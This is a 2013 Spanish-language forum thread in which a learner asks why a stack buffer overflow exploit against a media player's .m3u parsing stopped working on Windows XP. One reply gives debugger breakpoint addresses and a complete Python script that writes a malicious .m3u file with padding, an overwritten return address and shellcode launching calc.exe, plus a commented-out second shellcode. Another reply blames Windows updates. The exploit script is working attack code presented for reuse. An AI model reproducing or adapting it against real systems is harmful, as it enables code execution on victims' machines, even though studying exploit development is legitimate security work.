problemas con las DLL en el exploit

Schwarzschild · 25 Febrero 2013, 05:45 AM

Buenas les queria contar q estoy aprendiendo a crear exploit y me puse a leer los tutos de coleran(este es el tuto http://www.mediafire.com/?4fxv630j8k8yfa1) este es el exploit en el q estoy trabajando http://www.exploit-db.com/exploits/10374/, pasa lo sig arme el exploit como dice el tutorial,cuando lo arme funcionaba buscando jmp esp en una dll me ejecutaba la shell code pero dsp de unos dias ya no me la ejecutaba mas, ahora nomas me la deja ejecutar manualmente(sobrescribiendo eip y poniendo la direccion donde se aloja la shellcode de retorno),estoy trabajando en win xP sp1,busco una dll con un salto a esp pero no funciona,tamb intente con pop pop ret y tampoco.alguien que sepa del tema me podria guiar masomenos?si no entendieron algo de lo q escribi diganme jeje perdon si no me exprese bien
desde ya muchas gracias

Schwarzschild · 26 Febrero 2013, 03:21 AM

aca grabe el video para q se pueda ver mejor http://www.mediafire.com/?93s83tue898mt2j

Schwarzschild · 1 Marzo 2013, 02:41 AM

nadie me puede ayudar_

MCKSys Argentina · 1 Marzo 2013, 02:57 AM

OK, me bajé el programa y lo estuve mirando. Aparte, bajé el video y también lo miré.

Aunque no tengo el tutorial que estás siguiendo, te puedo dar la siguiente info:

La función vulnerable es la que comienza en 41E2B0. Usa Olly y ponle un BP ahí. Cuando pare, vas poder ver la dirección de retorno de la función en el stack. Esa es la dirección que se va a pisar.

Ahora, si pones un BP al final de la función (en 41E9EC) vas a ver el valor al cual está intentando retornar y así vas a poder ver porqué se está rompiendo tu exploit.

Ahora, hice pruebas en XP SP3 EN y el siguiente exploit anda bien (en python):

Código (python) [Seleccionar]


import os
import struct

def main():
    file1 = "exploit.m3u"
    junk = "\x41" * 26099
    eip= struct.pack('<L', 0x01cef23a)
    shellcode = "\x90" * 25
    shellcode += "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65\x78\x65"
    #shellcode += "\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66\xf3\x07"
    shellcode += "\x90" * 25
    f = open(file1, "wb")
    f.write(junk + eip + shellcode)
    f.close()
    print("exploit created successfully");

if __name__ == '__main__':
    main()

Fíjate que hay algunos cambios en los valores originales (en junk). El shellcode que estás usando está comentado porque no me funciona en este SO, pero he agregado uno que debería funcionar bien.

Saludos!

Иōҳ · 7 Marzo 2013, 22:16 PM

Joder, no solo en el subforo de ing. inversa, si no también aquí, xD, parece que juntarte con tantos ew ya te está volviendo uno

, por cierto ya eres ew? (tú me entiendes xd).

Nox.

MCKSys Argentina · 7 Marzo 2013, 23:27 PM

No, aun no tengo el "titulo"...

Falso Positivo · 13 Marzo 2013, 05:53 AM

Cita de: Schwarzschild en 25 Febrero 2013, 05:45 AM
Buenas les queria contar q estoy aprendiendo a crear exploit y me puse a leer los tutos de coleran(este es el tuto http://www.mediafire.com/?4fxv630j8k8yfa1) este es el exploit en el q estoy trabajando http://www.exploit-db.com/exploits/10374/, pasa lo sig arme el exploit como dice el tutorial,cuando lo arme funcionaba buscando jmp esp en una dll me ejecutaba la shell code pero dsp de unos dias ya no me la ejecutaba mas, ahora nomas me la deja ejecutar manualmente(sobrescribiendo eip y poniendo la direccion donde se aloja la shellcode de retorno),estoy trabajando en win xP sp1,busco una dll con un salto a esp pero no funciona,tamb intente con pop pop ret y tampoco.alguien que sepa del tema me podria guiar masomenos?si no entendieron algo de lo q escribi diganme jeje perdon si no me exprese bien
desde ya muchas gracias

si bien no tengo tiempo en este momento para reveer todo, recomiendo deshabilitar windows update ya que es posible que el exploit te dejo de funcionar debido a que el xp se actualizó, el payload cambiara entre sp y sp, también puede o no cambiar entre idiomas...quizá no sea éste el caso pero es bueno que lo sepas si estás iniciandote.